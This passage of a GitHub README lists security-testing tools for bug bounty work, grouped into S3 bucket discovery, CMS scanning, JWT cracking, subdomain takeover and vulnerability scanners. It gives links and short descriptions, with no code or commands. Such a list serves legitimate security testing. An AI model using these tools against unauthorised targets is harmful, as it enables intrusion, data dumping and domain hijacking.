</ul>
<h3 dir="auto"><a id="user-content-buckets" class="anchor" aria-hidden="true" href="buckets"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Buckets</h3>
<ul dir="auto">
<li><a href="https://github.com/sa7mon/S3Scanner">S3Scanner</a> - Scan for open AWS S3 buckets and dump the contents</li>
<li><a href="https://github.com/jordanpotti/AWSBucketDump">AWSBucketDump</a> - Security Tool to Look For Interesting Files in S3 Buckets</li>
<li><a href="https://github.com/jordanpotti/CloudScraper">CloudScraper</a> - CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.</li>
<li><a href="https://github.com/SharonBrizinov/s3viewer">s3viewer</a> - Publicly Open Amazon AWS S3 Bucket Viewer</li>
<li><a href="https://github.com/cr0hn/festin">festin</a> - FestIn - S3 Bucket Weakness Discovery</li>
<li><a href="https://github.com/hahwul/s3reverse">s3reverse</a> - The format of various s3 buckets is convert in one format. for bugbounty and security testing.</li>
<li><a href="https://github.com/random-robbie/mass-s3-bucket-tester">mass-s3-bucket-tester</a> - This tests a list of s3 buckets to see if they have dir listings enabled or if they are uploadable</li>
<li><a href="https://github.com/AlecBlance/S3BucketList">S3BucketList</a> - Firefox plugin that lists Amazon S3 Buckets found in requests</li>
<li><a href="https://github.com/cybercdh/dirlstr">dirlstr</a> - Finds Directory Listings or open S3 buckets from a list of URLs</li>
<li><a href="https://github.com/codewatchorg/Burp-AnonymousCloud">Burp-AnonymousCloud</a> - Burp extension that performs a passive scan to identify cloud buckets and then test them for publicly accessible vulnerabilities</li>
<li><a href="https://github.com/abuvanth/kicks3">kicks3</a> - S3 bucket finder from html,js and bucket misconfiguration testing tool</li>
<li><a href="https://github.com/Revenant40/2tearsinabucket">2tearsinabucket</a> - Enumerate s3 buckets for a specific target.</li>
<li><a href="https://github.com/nccgroup/s3_objects_check">s3_objects_check</a> - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files.</li>
<li><a href="https://github.com/ankane/s3tk">s3tk</a> - A security toolkit for Amazon S3</li>
<li><a href="https://github.com/0xsha/CloudBrute">CloudBrute</a> - Awesome cloud enumerator</li>
<li><a href="https://github.com/0xspade/s3cario">s3cario</a> - This tool will get the CNAME first if it's a valid Amazon s3 bucket and if it's not, it will try to check if the domain is a bucket name.</li>
<li><a href="https://github.com/JR0ch17/S3Cruze">S3Cruze</a> - All-in-one AWS S3 bucket tool for pentesters.</li>
</ul>
<h3 dir="auto"><a id="user-content-cms" class="anchor" aria-hidden="true" href="cms"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>CMS</h3>
<ul dir="auto">
<li><a href="https://github.com/wpscanteam/wpscan">wpscan</a> - WPScan is a free, for non-commercial use, black box WordPress security scanner</li>
<li><a href="https://github.com/cyc10n3/WPSpider">WPSpider</a> - A centralized dashboard for running and scheduling WordPress scans powered by wpscan utility.</li>
<li><a href="https://github.com/blackcrw/wprecon">wprecon</a> - Wordpress Recon</li>
<li><a href="https://github.com/Dionach/CMSmap">CMSmap</a> - CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.</li>
<li><a href="https://github.com/OWASP/joomscan">joomscan</a> - OWASP Joomla Vulnerability Scanner Project</li>
<li><a href="https://github.com/fgeek/pyfiscan">pyfiscan</a> - Free web-application vulnerability and version scanner</li>
</ul>
<h3 dir="auto"><a id="user-content-json-web-token" class="anchor" aria-hidden="true" href="json-web-token"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>JSON Web Token</h3>
<ul dir="auto">
<li><a href="https://github.com/ticarpi/jwt_tool">jwt_tool</a> - A toolkit for testing, tweaking and cracking JSON Web Tokens</li>
<li><a href="https://github.com/brendan-rius/c-jwt-cracker">c-jwt-cracker</a> - JWT brute force cracker written in C</li>
<li><a href="https://github.com/wallarm/jwt-heartbreaker">jwt-heartbreaker</a> - The Burp extension to check JWT (JSON Web Tokens) for using keys from known from public sources</li>
<li><a href="https://github.com/KINGSABRI/jwtear">jwtear</a> - Modular command-line tool to parse, create and manipulate JWT tokens for hackers</li>
<li><a href="https://github.com/dariusztytko/jwt-key-id-injector">jwt-key-id-injector</a> - Simple python script to check against hypothetical JWT vulnerability.</li>
<li><a href="https://github.com/hahwul/jwt-hack">jwt-hack</a> - jwt-hack is tool for hacking / security testing to JWT.</li>
<li><a href="https://github.com/lmammino/jwt-cracker">jwt-cracker</a> - Simple HS256 JWT token brute force cracker</li>
</ul>
<h3 dir="auto"><a id="user-content-subdomain-takeover" class="anchor" aria-hidden="true" href="subdomain-takeover"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Subdomain Takeover</h3>
<ul dir="auto">
<li><a href="https://github.com/haccer/subjack">subjack</a> - Subdomain Takeover tool written in Go</li>
<li><a href="https://github.com/Ice3man543/SubOver">SubOver</a> - A Powerful Subdomain Takeover Tool</li>
<li><a href="https://github.com/JordyZomer/autoSubTakeover">autoSubTakeover</a> - A tool used to check if a CNAME resolves to the scope address. If the CNAME resolves to a non-scope address it might be worth checking out if subdomain takeover is possible.</li>
<li><a href="https://github.com/shivsahni/NSBrute">NSBrute</a> - Python utility to takeover domains vulnerable to AWS NS Takeover</li>
<li><a href="https://github.com/EdOverflow/can-i-take-over-xyz">can-i-take-over-xyz</a> - "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.</li>
<li><a href="https://github.com/cybercdh/cnames">cnames</a> - take a list of resolved subdomains and output any corresponding CNAMES en masse.</li>
<li><a href="https://github.com/vavkamil/old-repos-backup/tree/master/subHijack-master">subHijack</a> - Hijacking forgotten & misconfigured subdomains</li>
<li><a href="https://github.com/anshumanbh/tko-subs">tko-subs</a> - A tool that can help detect and takeover subdomains with dead DNS records</li>
<li><a href="https://github.com/nahamsec/HostileSubBruteforcer">HostileSubBruteforcer</a> - This app will bruteforce for exisiting subdomains and provide information if the 3rd party host has been properly setup.</li>
<li><a href="https://github.com/mhmdiaa/second-order">second-order</a> - Second-order subdomain takeover scanner</li>
<li><a href="https://github.com/mzfr/takeover">takeover</a> - A tool for testing subdomain takeover possibilities at a mass scale.</li>
</ul>
<h3 dir="auto"><a id="user-content-vulnerability-scanners" class="anchor" aria-hidden="true" href="vulnerability-scanners"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Vulnerability Scanners</h3>
<ul dir="auto">
<li><a href="https://github.com/projectdiscovery/nuclei">nuclei</a> - Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use.</li>
<li><a href="https://github.com/1N3/Sn1per">Sn1per</a> - Automated pentest framework for offensive security experts</li>
<li><a href="https://github.com/rapid7/metasploit-framework">metasploit-framework</a> - Metasploit Framework</li>
<li><a href="https://github.com/sullo/nikto">nikto</a> - Nikto web server scanner</li>
<li><a href="https://github.com/Arachni/arachni">arachni</a> - Web Application Security Scanner Framework</li>
<li><a href="https://github.com/jaeles-project/jaeles">jaeles</a> - The Swiss Army knife for automated Web Application Testing</li>
<li><a href="https://github.com/RetireJS/retire.js">retire.js</a> - scanner detecting the use of JavaScript libraries with known vulnerabilities</li>
<li><a href="https://github.com/j3ssie/Osmedeus">Osmedeus</a> - Fully automated offensive security framework for reconnaissance and vulnerability scanning</li>
<li><a href="https://github.com/vulnersCom/getsploit">getsploit</a> - Command line utility for searching and downloading exploits</li>
<li><a href="https://github.com/cloudflare/flan">flan</a> - A pretty sweet vulnerability scanner</li>
<li><a href="https://github.com/1N3/Findsploit">Findsploit</a> - Find exploits in local and online databases instantly</li>
<li><a href="https://github.com/1N3/BlackWidow">BlackWidow</a> - A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website.</li>
<li><a href="https://github.com/PortSwigger/backslash-powered-scanner">backslash-powered-scanner</a> - Finds unknown classes of injection vulnerabilities</li>
<li><a href="https://github.com/BitTheByte/Eagle">Eagle</a> - Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities</li>
<li><a href="https://github.com/edoardottt/cariddi">cariddi</a> - Take a list of domains, crawl urls and scan for endpoints, secrets, api keys, file extensions, tokens and more...</li>
</ul>
<h3>Bonus</h3>
<li><a href="https://github.com/topics/bugbounty-tool">Bonus</a> </li>
</article>
</div>
</div>
</readme-toc>
</div>
</body>
</html>